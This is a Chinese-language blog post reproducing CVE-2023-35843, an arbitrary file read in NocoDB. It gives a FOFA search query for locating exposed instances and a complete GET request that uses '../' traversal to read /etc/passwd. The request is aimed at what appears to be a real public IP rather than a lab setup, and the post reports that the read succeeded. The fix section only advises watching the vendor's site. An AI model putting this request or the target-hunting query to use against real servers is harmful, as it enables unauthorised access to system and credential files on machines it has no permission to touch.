CVE-2023-35843:NocoDB任意文件读取漏洞复现

文章目录

  • NocoDB 存在任意文件读取漏洞CVE-2023-35843
    • 0x01 前言
    • 0x02 漏洞描述
    • 0x03 影响范围
    • 0x04 漏洞环境
    • 0x05 漏洞复现
      • 1.访问漏洞环境
      • 2.构造POC
      • 3.复现
    • 0x06修复建议

NocoDB 存在任意文件读取漏洞CVE-2023-35843

0x01 前言

本次测试仅供学习使用,如若非法他用,与本文作者无关,需自行负责!!!

0x02 漏洞描述

NocoDB是一个开源 Airtable 替代品。将任何 MySql、PostgreSql、Sql Server、Sqlite 和 MariaDb 转换为智能电子表格。NocoDB 0.106.0版本及之前版本存在安全漏洞。攻击者利用该漏洞可以访问服务器上的任意文件。

0x03 影响范围

NocoDB <= 0.106.1  

0x04 漏洞环境

fofa:“NocoDB”
CVE-2023-35843:NocoDB任意文件读取漏洞复现_第1张图片

0x05 漏洞复现

1.访问漏洞环境

CVE-2023-35843:NocoDB任意文件读取漏洞复现_第2张图片

2.构造POC

POC (GET)

GET /download/../../../../../etc/passwd HTTP/1.1
Host: 116.63.94.180:8082    
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive

3.复现

CVE-2023-35843:NocoDB任意文件读取漏洞复现_第3张图片发现成功响应,读取到/etc/passwd的内容。

0x06修复建议

目前厂商暂未发布修复措施解决此安全问题,建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法:https://www.nocodb.com/

你可能感兴趣的:(漏洞复现,系统安全,安全,web安全,网络安全)